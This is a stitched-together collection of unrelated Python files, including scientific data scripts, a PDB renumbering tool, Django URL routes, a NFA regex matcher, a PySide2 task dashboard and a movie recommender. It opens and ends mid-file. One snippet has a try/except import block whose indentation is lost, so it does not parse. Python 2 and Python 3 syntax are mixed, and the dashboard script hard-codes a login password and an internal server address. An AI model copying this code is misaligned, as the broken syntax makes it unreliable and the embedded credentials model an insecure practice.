    # Fix: renamed from `dict`, which shadowed the builtin type.
    summaries_by_category = {'not_enough': ne_summaries,
                             'scoping': scoping_summaries,
                             'contradiction': contradiction_summaries,
                             'certain': certain_summaries}
    pickle.dump(summaries_by_category, open("new_categorized_input_summaries.p", "wb"))
    import sys; sys.exit()
    # Unreachable while the early exit above is active (manual toggle).
    get_sentence_annotations()
    check_outputs("train_expanded.source",
                  "/data/rsg/nlp/darsh/MatrixEmbedding/fairseq/infilling-categorized-bin/train.hypo",
                  "train.source8",
                  "train.target8")
    check_pubmed_outputs(data)
|
from functions import isPrime, isPadnigital
def same_digits(n):
    """Return True if any digit of n occurs more than once."""
    digits = str(n)
    return any(digits.count(d) > 1 for d in digits)
def main():
    """Print odd candidates in [10001, 10000000) that are pandigital primes."""
    for candidate in range(10001, 10000000, 2):
        # Repeated digits or a trailing zero disqualify the candidate early.
        if same_digits(candidate) or candidate % 10 == 0:
            continue
        if isPrime(candidate) and isPadnigital(candidate):
            print(candidate)
# Run the search only when executed as a script.
if __name__=='__main__':
    main()
|
#! /usr/local/bin/python
#! -*- encoding:utf-8 -*-
from pathlib import Path
import pandas as pd
import numpy as np
import random
import os
def generate_gt(clusters, dataset):
    """Write ground-truth (label 1) and junk (label 0) cell-cell interaction
    CSVs for every cluster pair listed in the combined interaction table.

    A cell pair is ground truth when at least one ligand-receptor gene pair
    is expressed (> 0) in both cells, in either direction.

    Parameters
    ----------
    clusters : container of cluster ids to process; other pairs are skipped
    dataset : str, output directory name interpolated into the path templates
    """
    cci_labels_gt_path = '{}/mouse_small_intestine_1189_cci_labels_gt_{}_{}.csv'
    cci_labels_junk_path = '{}/mouse_small_intestine_1189_cci_labels_junk_{}_{}.csv'
    data_path = 'mouse_small_intestine_1189_data.csv'
    type_path = 'mouse_small_intestine_1189_cellcluster.csv'
    cci_path = 'mouse_small_intestine_1189_cluster_cluster_interaction_combined.csv'
    ligand_receptor_pair_path = 'mouse_ligand_receptor_pair.csv'

    # Expression matrix: (gene, cell) on disk -> (cell, gene) in memory.
    df = pd.read_csv(data_path, index_col=0)
    df = df.fillna(0)
    df = df.transpose(copy=True)
    df['id'] = range(0, len(df))  # add cell id
    # Fix: astype() returns a new Series; the original discarded the result.
    df['id'] = df['id'].astype(int)
    cell2type = pd.read_csv(type_path, index_col=0)
    cell2type.columns = ['cell', 'type']
    # The type table must be row-aligned with the expression matrix.
    assert cell2type['cell'].tolist() == df.index.tolist()
    df['type'] = cell2type['type'].tolist()

    # Cluster-cluster interactions and ligand/receptor gene lists.
    cci = pd.read_csv(cci_path, header=0, index_col=0)
    lcp = pd.read_csv(ligand_receptor_pair_path, header=0, index_col=0)
    ligand = lcp['ligand'].tolist()
    receptor = lcp['receptor'].tolist()
    # Check both orientations: cell1-ligand/cell2-receptor and the reverse.
    pair1_mask = ligand + receptor
    pair2_mask = receptor + ligand

    mp = dict()  # df1 cell id -> a df2 cell id it interacts with
    for m in range(len(cci)):
        id1 = cci.iloc[m]['cluster1']
        id2 = cci.iloc[m]['cluster2']
        if (id1 not in clusters) or (id2 not in clusters):
            continue
        print(f'cluster: {id1}, {id2}')
        df1 = df[df['type'] == id1]
        df2 = df[df['type'] == id2]
        print(f'total pairs: {len(df1)*len(df2)}')
        # assert len(df1) > 0, f"the cluster {id1} doesn't appear in the dataset."
        # assert len(df2) > 0, f"the cluster {id2} doesn't appear in the dataset."
        cur_cci = []
        cur_cci_junk = []
        for i in range(len(df1)):
            # Hoisted out of the inner loop: row i's vector is j-invariant.
            pair1 = df1.iloc[i][pair1_mask].fillna(0)
            pair1.index = list(range(len(pair1)))
            id_i = df1.iloc[i]['id']
            for j in range(len(df2)):
                pair2 = df2.iloc[j][pair2_mask].fillna(0)
                pair2.index = list(range(len(pair2)))
                # Fix: axis must be a keyword argument (pandas >= 2.0 removed
                # positional arguments after the first in concat).
                pair = pd.concat([pair1, pair2], axis=1)
                # Interaction iff any ligand/receptor row is expressed in both.
                if ((pair.iloc[:, 0] > 0) & (pair.iloc[:, 1] > 0)).any():
                    cur_cci.append([id_i, df2.iloc[j]['id'], 1])
                    mp[id_i] = df2.iloc[j]['id']
                elif id_i not in mp:
                    cur_cci_junk.append([id_i, df2.iloc[j]['id'], 0])
        with open(cci_labels_gt_path.format(dataset, id1, id2), 'w', encoding='utf-8') as f:
            print(f"cur cci {len(cur_cci)}")
            for cci_label in cur_cci:
                f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
        with open(cci_labels_junk_path.format(dataset, id1, id2), 'w', encoding='utf-8') as f:
            print(f"cur cci junk {len(cur_cci_junk)}")
            for cci_label in cur_cci_junk:
                f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
def generate_junk(clusters, dataset):
    """Write non-interacting (label 0) cell pairs that do not appear in any
    ground-truth file under `dataset`/ to a single junk CSV.

    NOTE(review): `clusters` is unused here; candidate pairs come only from
    the gt files found on disk — confirm whether filtering was intended.
    """
    dir_path = Path(os.getcwd())
    dataset_path = dir_path / dataset
    data_files = dataset_path.glob('*gt*.csv')
    # mp: cell id -> set of partner ids already labelled as interacting.
    mp = dict()
    for file in data_files:
        print(file)
        with open(str(file), 'r', encoding='utf-8') as f:
            # Iterate the file lazily instead of materializing readlines().
            for line in f:
                tri = line.strip().split(',')
                mp.setdefault(int(tri[0]), set()).add(int(tri[1]))
    data_path = 'mouse_small_intestine_1189_data.csv'
    df = pd.read_csv(data_path, index_col=0)  # (gene, cell)
    df = df.fillna(0)
    df = df.transpose(copy=True)  # (cell, gene)
    df['id'] = range(0, len(df))  # add cell id
    # Fix: astype() returns a new Series; the original discarded the result.
    df['id'] = df['id'].astype(int)
    cur_cci_junk = []
    for i in range(len(df)):
        # NOTE(review): this cap keeps only pairs for cell 0 — it looks like
        # a debugging leftover; confirm intent before removing.
        if i > 0:
            break
        for j in range(i + 1, len(df)):
            # Skip pairs already labelled as interacting in a gt file.
            if i in mp and j in mp[i]:
                continue
            cur_cci_junk.append([i, j, 0])
    print(f'total junk: {len(cur_cci_junk)}')
    cci_labels_junk_path = '{}/mouse_small_intestine_1189_cci_labels_junk.csv'
    with open(cci_labels_junk_path.format(dataset), 'w', encoding='utf-8') as f:
        print(f"cur cci junk {len(cur_cci_junk)}")
        for cci_label in cur_cci_junk:
            f.write(f"{int(cci_label[0])},{int(cci_label[1])},{int(cci_label[2])}\r\n")
if __name__ == "__main__":
    import os
    # Work inside the local cell-cell-interaction data directory.
    os.chdir('/Users/yryang/Desktop/code/cci/data/cell_cell_interaction/')
    print(os.getcwd())
    # Cluster ids held out for testing vs. used for training.
    test_cluster = [5,6,10,11,12,15]
    train_cluster = [1, 2,3,4,7,8,9,13,14,16,17,18,19]
    # test_dataset
    # generate_gt(test_cluster, dataset='test_dataset')
    generate_junk(test_cluster, dataset='test_dataset')
    # train_dataset
    # generate_gt(train_cluster, dataset='train_dataset')
    # generate_junk(train_cluster, dataset='train_dataset')
# This script trys to avoid the following error message from Label:
# "Duplicate sequence number and insertion code."
# It only addresses waters for now since that's where I've seen
# the problem thus far and since numbering for waters is more arbitrary
# than for other molecules -- but it could easily be made more general.
# Actually, as of 11/25/13, I can't remember which cases actually had
# this problem -- but I do remember such cases existing...
import sys
def parse_line(line):
    """Extract (chain, resseq, icode, restype, altconf) from a PDB record.

    Uses the fixed PDB column layout; resseq is returned as an int.
    """
    return (
        line[21:22],                  # chain identifier
        int(line[22:26].strip()),     # residue sequence number
        line[26:27],                  # insertion code
        line[17:20],                  # residue type, e.g. 'HOH'
        line[16:17],                  # alternate-conformation flag
    )
# NOTE(review): this script body uses Python 2 print statements throughout.
# Figure out the max residue number per chain so we can know
# where to start incrementing from in the next step
max_resseqs = {} # chain --> int
f = open(sys.argv[1], "r")
lines = f.readlines()
f.close()
for line in lines:
    if line.startswith("ATOM  ") or line.startswith("HETATM"):
        chain, resseq, icode, restype, altconf = parse_line(line)
        # Track the highest residue number seen per chain.
        if chain not in max_resseqs:
            max_resseqs[chain] = resseq
        elif resseq > max_resseqs[chain]:
            max_resseqs[chain] = resseq
# Find combinations of residue number + insertion code that are duplicated
# within a chain, and immediately renumber them
chain_resseq_icodes = set()
prev_line_resseq = None
for line in lines:
    if line.startswith("ATOM  ") \
    or line.startswith("HETATM") \
    or line.startswith("ANISOU"):
        chain, resseq, icode, restype, altconf = parse_line(line)
        cri = (chain, resseq, icode)
        if cri in chain_resseq_icodes and altconf == ' ' and restype == 'HOH':
            # Duplicate water!  Give it a fresh number past the chain's max.
            if line.startswith("ATOM  ") or line.startswith("HETATM"):
                new_max_resseq = max_resseqs[chain] + 1
                max_resseqs[chain] = new_max_resseq
                new_resseq = new_max_resseq
                prev_line_resseq = new_max_resseq
            elif line.startswith("ANISOU"):
                # Assume previous line was ATOM or HETATM for same residue...
                #print 'HOH %d' % prev_line_resseq
                new_resseq = prev_line_resseq
            # Splice the new number into the fixed resseq columns (22-25).
            new_line = line[0:22] + str(new_resseq).rjust(4) + line[26:]
            print new_line ,
        else:
            # Unique (so far) ATOM/HETATM/ANISOU, or alt conf
            print line ,
            prev_line_resseq = resseq
            if line.startswith("ATOM  ") or line.startswith("HETATM"):
                chain_resseq_icodes.add(cri)
    else:
        # Header or something
        print line ,
|
import os
import subprocess
import sys
from napari._tests.utils import skip_on_win_ci
# Script executed in a subprocess: opens a napari viewer on random data.
CREATE_VIEWER_SCRIPT = """
import numpy as np
import napari
v = napari.view_image(np.random.rand(512, 512))
"""
@skip_on_win_ci
def test_octree_import():
    """Test we can create a viewer with NAPARI_OCTREE."""
    # NAPARI_CONFIG='' stops the subprocess from trying to save a config.
    env = dict(os.environ, NAPARI_OCTREE='1', NAPARI_CONFIG='')
    command = [sys.executable, '-c', CREATE_VIEWER_SCRIPT]
    subprocess.run(command, check=True, env=env)
|
from django.urls import path
from .apis import *
# Account/authentication endpoints; each route delegates to a class-based
# API view imported from .apis.
urlpatterns = [
    path('auth/sign_in', SignInApi.as_view(), name='sign_in'),
    # User detail and state management.
    path('users/<int:user_id>', UserDetailApi.as_view(), name='user_detail'),
    path('users/update', UserUpdateApi.as_view(), name='user_update'),
    path('users/<int:user_id>/deactivate', UserDeactivateApi.as_view(), name='user_deactivate'),
    path('users/<int:user_id>/activate', UserActivateApi.as_view(), name='user_activate'),
    # Password management flows.
    path('users/change_password', UserChangePasswordApi.as_view(), name='user_change_password'),
    path('users/req_reset_password', UserRequestResetPasswordApi.as_view(), name='user_req_reset_password'),
    path('users/reset_password', UserResetPasswordApi.as_view(), name='user_reset_password'),
    path('users/create', UserCreateApi.as_view(), name='create_user'),
    path('users/sign_out', UserSignOutApi.as_view(), name='sign_out')
]
from django.utils.translation import ugettext_lazy as _
from google.appengine.ext import db
from ragendja.auth.google_models import GoogleUserTraits
class User(GoogleUserTraits):
    """User class that provides support for Django and Google Accounts."""
    # Underlying Google Accounts user object.
    user = db.UserProperty()
    username = db.StringProperty(required=True, verbose_name=_('username'))
    email = db.EmailProperty(verbose_name=_('e-mail address'))
    first_name = db.StringProperty(verbose_name=_('first name'))
    last_name = db.StringProperty(verbose_name=_('last name'))

    @classmethod
    def create_djangouser_for_user(cls, user):
        """Create, persist, and return a datastore User mirroring the
        given Google Accounts user."""
        django_user = cls(user=user, email=user.email(),
                          username=user.nickname())
        django_user.put()
        return django_user
|
import time
import numpy as np
# for python <3.6
from pylo import FallbackModuleNotFoundError
try:
import DigitalMicrograph as DM
except (FallbackModuleNotFoundError, ImportError) as e:
DM = None
# from .dm_camera import DMCamera
from pylo import loader
DMCamera = loader.getDeviceClass("Digital Micrograph Camera")
class _DMDummyCamera:
    """Stand-in for a real Digital Micrograph camera: mimics the camera API
    with random image data and short sleeps."""

    def PrepareForAcquire(self):
        # Real cameras insert themselves before acquiring.
        self.SetInserted(True)

    def AcquireImage(self, exposure_time, binning_x=1, binning_y=1,
                     process_level=1, ccd_area_top=0, ccd_area_left=0,
                     ccd_area_bottom=4096, ccd_area_right=4096):
        """Simulate an exposure and return a random image of the binned CCD
        area.  NOTE(review): requires the module-level DM import to have
        succeeded (DM is None outside GMS) — confirm callers guard this."""
        time.sleep(exposure_time)
        data = np.random.random(((ccd_area_right - ccd_area_left) // binning_x,
                                 (ccd_area_bottom - ccd_area_top) // binning_y))
        time.sleep(0.1)
        img = DM.CreateImage(data)
        time.sleep(0.1)
        return img

    def IsRetractable(self):
        # The dummy pretends it can always be retracted.
        return True

    def SetInserted(self, inserted):
        """Remember the inserted flag; on retraction, notify the user via a
        DM dialog when available, otherwise via stdout."""
        self.inserted = inserted
        if not inserted:
            try:
                import DigitalMicrograph as DM
            except Exception:
                DM = None
            text = "Camera {} is now retracted!".format(self.__class__.__name__)
            if DM is not None:
                DM.OkDialog(text)
            else:
                print(text)
class DMTestCamera(DMCamera):
    """DMCamera subclass that swaps in the dummy camera for testing."""

    def __init__(self, *args, **kwargs) -> None:
        """Create a new dm camera object.

        Parameters
        ----------
        controller : Controller
            The controller
        """
        super(DMTestCamera, self).__init__(*args, **kwargs)
        # Replace the real camera handle with the dummy implementation.
        self.camera = _DMDummyCamera()

    @staticmethod
    def defineConfigurationOptions(*args, **kwargs) -> None:
        # Delegate to the base class; the test camera adds no extra options.
        DMCamera.defineConfigurationOptions(*args, **kwargs)
"""
Regular-expression matching by the Thompson construction.
Explained in C at http://swtch.com/~rsc/regexp/regexp1.html
This code follows the same interface as backtrack.py in this same
directory (except we dropped 'fail' as uninteresting). backtrack.py is
easier to follow but suffers exponential blowup on some regexes. Both
of these loop on nested stars like r'a**', though (as Thompson himself
pointed out in his paper). deriv.py OTOH should work in all cases, but
needs more code.
"""
def match(re, s):
    """Run the NFA built from `re` over string `s`; True iff it accepts.

    `re` is a continuation-style machine builder (see lit/seq/alt/many);
    `accepting` is the final state and the 'ACCEPT' sentinel marks success.
    """
    states = set([re(accepting)])
    for c in s:
        # Bug fix: the original `set.union(*[...])` raises TypeError once
        # every state has died (e.g. match(lit('x'), 'xyz')), because
        # unbound set.union needs at least one argument.  Starting from an
        # empty set makes the union of zero sets simply set().
        states = set().union(*[state(c) for state in states])
    return any('ACCEPT' in state(None) for state in states)
def lit(char):
    """Machine matching exactly `char`, then moving to the continuation."""
    def builder(state):
        def step(c):
            return {state} if c == char else set()
        return step
    return builder
# `accepting` is the final state: it yields {'ACCEPT'} only for the
# end-of-input sentinel None (see match()).
accepting = lit(None)('ACCEPT')
# `empty` matches the empty string: it passes the continuation through.
empty = lambda state: state
def seq(re1, re2):
    """Concatenation: re1 runs first; re2's machine is its continuation."""
    return lambda state: re1(re2(state))
def alt(re1, re2):
    """Alternation: build both machines and merge their transitions."""
    def either(state):
        branch1 = re1(state)
        branch2 = re2(state)
        def step(c):
            # A character is accepted by the union of both branches.
            return branch1(c) | branch2(c)
        return step
    return either
def many(re):
    """Kleene star of `re` (zero or more repetitions)."""
    def re_star(state):
        # Tie the knot: `loop` is both the entry state (zero repetitions
        # fall through to `state`) and the state the inner machine returns
        # to for another repetition.  NOTE(review): loops forever on nested
        # stars like many(many(x)), as the module docstring warns.
        def loop(c): return state(c) | re_plus(c)
        re_plus = re(loop)
        return loop
    return re_star
## match(empty, '')
#. True
## match(empty, 'A')
#. False
## match(lit('x'), '')
#. False
## match(lit('x'), 'y')
#. False
## match(lit('x'), 'x')
#. True
## match(lit('x'), 'xx')
#. False
## match(seq(lit('a'), lit('b')), '')
#. False
## match(seq(lit('a'), lit('b')), 'ab')
#. True
## match(alt(lit('a'), lit('b')), 'b')
#. True
## match(alt(lit('a'), lit('b')), 'a')
#. True
## match(alt(lit('a'), lit('b')), 'x')
#. False
## match(many(lit('a')), '')
#. True
## match(many(lit('a')), 'a')
#. True
## match(many(lit('a')), 'x')
#. False
## match(many(lit('a')), 'aa')
#. True
## match(many(lit('a')), 'ax')
#. False
## complicated = seq(many(alt(seq(lit('a'), lit('b')), seq(lit('a'), seq(lit('x'), lit('y'))))), lit('z'))
## match(complicated, '')
#. False
## match(complicated, 'z')
#. True
## match(complicated, 'abz')
#. True
## match(complicated, 'ababaxyab')
#. False
## match(complicated, 'ababaxyabz')
#. True
## match(complicated, 'ababaxyaxz')
#. False
# N.B. infinite recursion, like Thompson's original code:
### match(many(many(lit('x'))), 'xxxx')
# Had a bug: empty forced a match regardless of the continuation.
## match(seq(empty, lit('x')), '')
#. False
## match(seq(empty, lit('x')), 'x')
#. True
|
# _ * _ coding: utf-8 _ * _ #
# @Time :2020/7/23 17:22
# @FileName :workbench_wedget.py
# @Author :LiuYang
from PySide2 import QtWidgets
from PySide2 import QtCore
from PySide2 import QtGui
import dayu_widgets as dy
class WorkBench(QtWidgets.QFrame):
    """Personal workbench window: a 2x3 grid of task-count tiles."""

    def __init__(self):
        super(WorkBench, self).__init__()
        # self.setFixedSize(300, 600)
        self.MainLayout = QtWidgets.QGridLayout(self)
        # Tiles: (label, severity level used to colour the count).
        self.warningButton = TaskInfoWidget(u"警告任务", 3)
        self.feedbackButton = TaskInfoWidget(u"反馈任务", 2)
        self.todayTaskButton = TaskInfoWidget(u"今日任务", 1)
        self.weekTaskButton = TaskInfoWidget(u"本周任务", 0)
        self.dailyTaskButton = TaskInfoWidget(u"审核任务", 0)
        self.doneTaskButton = TaskInfoWidget(u"完成任务", 0)
        # Lay the six tiles out in two columns.
        self.MainLayout.addWidget(self.warningButton, 0, 0)
        self.MainLayout.addWidget(self.feedbackButton, 0, 1)
        self.MainLayout.addWidget(self.todayTaskButton, 1, 0)
        self.MainLayout.addWidget(self.weekTaskButton, 1, 1)
        self.MainLayout.addWidget(self.dailyTaskButton, 2, 0)
        self.MainLayout.addWidget(self.doneTaskButton, 2, 1)
        theme = dy.MTheme("dark")
        theme.apply(self)

    def set_data(self, data):
        """Update every tile's count from a statistics mapping.

        `data` maps API statistic keys ('warning', 'feedback', ...) to
        counts; unknown keys would raise KeyError.
        """
        mapping = {"warning": self.warningButton,
                   "feedback": self.feedbackButton,
                   "today": self.todayTaskButton,
                   "this_week": self.weekTaskButton,
                   "daily": self.dailyTaskButton,
                   "done": self.doneTaskButton}
        for key, values in data.items():
            mapping[key].numLabel.setText(str(values))
class TaskInfoWidget(QtWidgets.QWidget):
    """A clickable count-over-caption tile for one task statistic.

    Emits `left_clicked` with the tile's caption text on left mouse press.
    """
    # Severity level -> dayu MLabel type used to colour the count.
    warning_level = {3: "danger", 2: "warning", 1: "secondary", 0: "null"}
    left_clicked = QtCore.Signal(str)

    def __init__(self, name, level):
        super(TaskInfoWidget, self).__init__()
        self.MainLayout = QtWidgets.QVBoxLayout(self)
        self.numLabel = dy.MLabel().h1()
        self.numLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.nameLabel = QtWidgets.QLabel(name)
        self.nameLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.numLabel.set_dayu_type(self.warning_level[level])
        self.setup_ui()
        self.set_style_sheet()

    def setup_ui(self):
        # Stack the count above its caption.
        self.MainLayout.addWidget(self.numLabel)
        self.MainLayout.addWidget(self.nameLabel)

    def set_style_sheet(self):
        self.nameLabel.setStyleSheet("color: #cccccc; \n font-size:16px '微软雅黑'")

    def mousePressEvent(self, event):
        if event.button() == QtCore.Qt.LeftButton:
            # Fix: was a Python 2 print statement, a SyntaxError under
            # Python 3; parenthesized form works on both.
            print(self.nameLabel.text())
            self.left_clicked.emit(self.nameLabel.text())
if __name__ == "__main__":
    import sys
    sys.path.append("D:/SMWH_project/teamones_sdk")
    from teamones_api import teamnoes
    # NOTE(review): credentials are hard-coded for local testing — do not ship.
    tm = teamnoes.TeamOnes(base_url="http://10.168.30.17:18101", username="18210589458", password="123456")
    data = tm.task.get_personal_task_statistics()
    app = QtWidgets.QApplication([])
    log = WorkBench()
    log.set_data(data)
    log.show()
    app.exec_()
|
# Module-level x; func() below receives it as a parameter and shadows it.
x = 50
def func(x):
    """Echo the argument, rebind the local name, and return the new value."""
    print("x is {}".format(x))
    # Local assignment on a global variable: rebinding the parameter does
    # not affect the caller's variable — only the returned value does.
    x = "New value"
    print("\nx is now - {}".format(x))
    return x
print(x)
# func() returns its local "New value", which rebinds the global here.
x = func(x)
print(x)
|
import calendar as cal

# weekday(year, month, day) -> 0=Monday ... 6=Sunday
print(cal.weekday(2018,3,3))
# monthrange(year, month) -> (weekday of the 1st, number of days in month)
print(cal.monthrange(2018,3))
cc = cal.Calendar()
# First weekday of a default Calendar is 0 (Monday).
print(cc.getfirstweekday())
|
# commands/push.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from textwrap import dedent
from .basecommand import BaseCommand
class PushCommand(BaseCommand):
    """Push a registered markdown post's rendered HTML to the remote blog."""
    NAME = 'push'
    HELP = "Push html to remote server."
    DESCR = dedent("""\
    Push html to remote server.
    """)
    require_interactive = True

    @classmethod
    def fill_parser(cls, parser):
        # Command-line arguments for `push`.
        parser.add_argument('file', help="md file to link with")
        parser.add_argument('--always', default=False, action='store_true',
                            help="Always regenerate html files")

    def __init__(self, args):
        self.file = args.file
        self.always = args.always

    def run(self):
        """Render the post if needed and push its HTML to the remote blog.

        Logs an error and returns early when the file is unregistered or
        has never been pushed (no postid yet).
        """
        config = self.config
        post = config.post_by_path(self.file)
        if not post:
            self.log.error("MD file '%s' is not registered", self.file)
            return
        if not post.postid:
            self.log.error("MD file '%s' has not pushed on server yet",
                           self.file)
            return
        post.refresh_html(self.always)
        srv = config.info.remote()
        rpost = srv.get_post(post.postid)
        this = post.inner_html()
        # Build the updated remote post from content, title and labels.
        updated_rpost = rpost.set_content(this)
        updated_rpost = updated_rpost.set_title(post.title)
        updated_rpost = updated_rpost.set_labels(post.labels)
        #updated_rpost = updated_rpost.set_link(post.link)
        srv.update_post(updated_rpost)
        self.log.info("Post %s updated", post.name)
        # Mirror the server's timestamps locally and mark the post clean.
        post.published = rpost.published
        post.updated = rpost.updated
        post.changed = False
|
from django.http import HttpResponse
def check_answers(request):
    """Compare the POSTed quiz answers against the session's expected
    values and return "correct" or "incorrect" as plain text."""
    ans = request.POST
    fields = ('trigger_channel', 'action_channel', 'trigger_fn', 'action_fn')
    # Same short-circuit order as comparing the fields one by one.
    if all(ans[field] == request.session[field] for field in fields):
        return HttpResponse("correct")
    return HttpResponse("incorrect")
|
import re
import sys
# Read the whole log (path given as argv[1]) as one line-free string.
with open(sys.argv[1], 'r') as myfile:
    data = myfile.read().replace('\n', '')
# Extract the <username> following each [timestamp] marker.
post_username = re.findall(r'\[.+?\]\s<(.+?)>', data)
# Count posts per user.
user_frequency = dict()
for user in post_username:
    user_frequency[user] = user_frequency.get(user, 0) + 1
print ("Users sorted alphabetically:")
print ("Frequency\t", "Username" )
for i in sorted(user_frequency):
    print (user_frequency[i], "\t\t", i)
print ("\nUsers sorted by post frequency:")
print ("Frequency\t", "Username")
# Sorting by the dict's get yields ascending post counts.
for i in sorted(user_frequency, key=user_frequency.get):
    print (user_frequency[i], "\t\t", i)
print ("\nNumber of Posts:", len(post_username), "\n")
print ("Number of Users:", len(user_frequency), "\n")
|
import numpy as np
import pandas as pd
import matrix_factorization_utilities
# Load user ratings
raw_dataset_df = pd.read_csv('movie_ratings_data_set.csv')
# Load movie titles and genres
movies_df = pd.read_csv('movies.csv', index_col='movie_id')
# Convert the running list of user ratings into a matrix
ratings_df = pd.pivot_table(raw_dataset_df, index='user_id',
                            columns='movie_id',
                            aggfunc=np.max)
# Apply matrix factorization to find the latent features
# NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0 — this
# script needs an old pandas (use .to_numpy() on upgrade).
U, M = matrix_factorization_utilities.low_rank_matrix_factorization(ratings_df.as_matrix(),
                                                                    num_features=15,
                                                                    regularization_amount=0.1)
# Find all predicted ratings by multiplying U and M matrices
predicted_ratings = np.dot(U, M)
print("Enter a user_id to get recommendations (Between 1 and 100):")
user_id_to_search = int(input())
print("Movies previously reviewed by user_id {}:".format(user_id_to_search))
# Match user input to the correct user id
reviewed_movies_df = raw_dataset_df[raw_dataset_df['user_id'] == user_id_to_search]
# Join this list of reviews with the movie df data frame so we can display the title of each movie
reviewed_movies_df = reviewed_movies_df.join(movies_df, on='movie_id')
print(reviewed_movies_df[['title', 'genre', 'value']])
# Note input() raises EOF error in python 2.7...use raw_input() instead
# NOTE(review): raw_input exists only on Python 2; this script is Py2-era.
raw_input("Press enter to continue.")
print("Movies we will recommend:")
# Pull out the predicted ratings for this specific user
# Need to -1 because the array is zero indexed but the user IDs start at 1)
user_ratings = predicted_ratings[user_id_to_search - 1]
# Save the predicted rating for each movie back to the list of movies so its easier to print out
movies_df['rating'] = user_ratings
# Recommend only movies the user has not already reviewed, best first.
already_reviewed = reviewed_movies_df['movie_id']
recommended_df = movies_df[movies_df.index.isin(already_reviewed) == False]
recommended_df = recommended_df.sort_values(by=['rating'], ascending=False)
print(recommended_df[['title', 'genre', 'rating']].head(5))
|
# 分析法
# 从最大的可能开始填起
# 即对应有(1+3) * (1+3) = 16个全部 填 34~49
# 只有34填到每周中位数中才合乎要求,其它位置1~33可随便填 |
# imports
__author__ = 'DuyAnhPham'
|
#!/usr/bin/env python
"""
Generic script template to use to create shell scripts in python. This will
setup basic logging and with a -v flag will also log to the console.
"""
# Imports go here
import logging
import argparse
import os

# Directory/name of this script; the log file sits next to the script.
SCRIPTDIR, SCRIPTNAME = os.path.split(os.path.abspath(__file__))
LOGFILE = os.path.join(SCRIPTDIR, (os.path.splitext(__file__)[0] + '.log'))

if __name__ == '__main__':
    # -v flag will turn on verbose logging
    parser = argparse.ArgumentParser(description="PROGRAM DESCRIPTION")
    parser.add_argument("-v", "--verbose", dest='verbose',
                        help="Turn on verbose logging", action='store_true',
                        default=False)
    args = parser.parse_args()
    # Always log to a file
    log = logging.getLogger(__file__)
    log.setLevel(logging.WARNING)
    formatter = logging.Formatter('%(asctime)s - %(message)s')
    fh = logging.FileHandler(LOGFILE)
    fh.setFormatter(formatter)
    log.addHandler(fh)
    # Log to the screen if verbose is turned on.
    if args.verbose:
        log.setLevel(logging.DEBUG)
        ch = logging.StreamHandler()
        ch.setFormatter(formatter)
        log.addHandler(ch)
    # Example messages at every level (DEBUG/INFO appear only with -v).
    log.debug('debug message')
    log.info('info message')
    # FIX: Logger.warn() is a deprecated alias of warning().
    log.warning('warn message')
    log.error('error message')
    log.critical('critical message')
|
def get_integer(m):
    """Prompt with *m* and return the user's reply converted to int."""
    return int(input(m))
def get_string(m):
    """Prompt with *m* and return the raw reply string."""
    return input(m)
def add_name_age(N, A):
    """Interactively append user-entered name/age pairs to lists N and A."""
    count = get_integer("How many people would you like to add to the list? -> ")
    for _ in range(count):
        # Collect one name/age pair per iteration.
        name = get_string("Please enter a name: -> ")
        age = get_integer("Please enter {}'s age: -> ".format(name))
        N.append(name)
        A.append(age)
        print("." * 50)
        print("{}, age {} has been added to the list".format(name, age))
        print("." * 50)
def review(N, A):
    """Print every name/age pair, or a warning if the lists differ in length."""
    if len(N) != len(A):
        print("List one doesn't have same number of elements as list two")
        return
    for person, years in zip(N, A):
        print("{} is {} years old".format(person, years))
    print("." * 50)
def menu():
    """Run the interactive add/review menu loop until the user quits."""
    name = []
    age = []
    my_menu = '''
    A: Add
    B: Review
    Q: Quit
    '''
    while True:
        print(my_menu)
        choice = get_string("Please select your option: -> ").upper()
        print("." * 50)
        if choice == "A":
            add_name_age(name, age)
        elif choice == "B":
            review(name, age)
        elif choice == "Q":
            print("Thank you!")
            break
        else:
            print("Invalid entry")


# Start the interactive program.
menu()
|
"""
区域填充:
"""
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.patches as mpaches
fig, ax = plt.subplots() # 这种方式可以同时返回Figure对象和axes对象
# 方法:生成圆
circle = mpaches.Circle(np.array([0.2, 0.2]), 0.03)
ax.add_patch(circle)
# 方法:生成矩形
rect = mpaches.Rectangle([0.1, 0.1], 0.05, 0.03, color='r')
ax.add_patch(rect)
# [0.1, 0.1]表示左下角的坐标,0.2表示宽,0.1表示高
# 方法:生成多边形
polygon = mpaches.RegularPolygon([0.225, 0.12], 5, 0.03, color='y')
ax.add_patch(polygon)
# 方法:椭圆生成的方法:
ellips = mpaches.Ellipse([0.125, 0.2], 0.03, 0.04)
ax.add_patch(ellips)
plt.axis('equal') # 表示x,y坐标轴刻度相等
ax.grid(alpha=0.3)
plt.show()
|
import os
import sys
import pickle
import fam
"""
all event counts aec: aec[model][generax_radius][event] = count
"""
def _save_all_event_counts(datadir, aec):
    """Serialize aec (aec[model][radius][event] = count) to the datadir's
    event-counts file, one "model|radius|ev1=c1,ev2=c2,..." line per entry."""
    out = fam.get_event_counts_file(datadir)
    with open(out, "w") as writer:
        for model, per_radius in aec.items():
            for generax_radius, event_counts in per_radius.items():
                pairs = ["{}={}".format(ev, count) for ev, count in event_counts.items()]
                writer.write("{}|{}|{}\n".format(model, generax_radius, ",".join(pairs)))
def _add_event_counts(aec, model, generax_radius, event_counts):
if (not model in aec):
aec[model] = {}
aec[model][generax_radius] = event_counts
def get_all_event_counts(datadir):
    """Parse the datadir's event-counts file back into the nested
    aec[model][generax_radius][event] = count dictionary.

    Returns an empty dict if the file does not exist; lines with fewer
    than three '|'-separated fields are skipped.
    """
    f = fam.get_event_counts_file(datadir)
    aec = {}
    if (not os.path.isfile(f)):
        return aec
    # FIX: open the file in a context manager so the handle is closed
    # deterministically (the original `open(f).readlines()` leaked it), and
    # iterate the file directly instead of materializing all lines.
    with open(f) as reader:
        for line in reader:
            sp = line.split("|")
            if (len(sp) < 3):
                continue
            model = sp[0]
            generax_radius = int(sp[1])
            event_counts = {}
            for p in sp[2].split(","):
                sp2 = p.split("=")
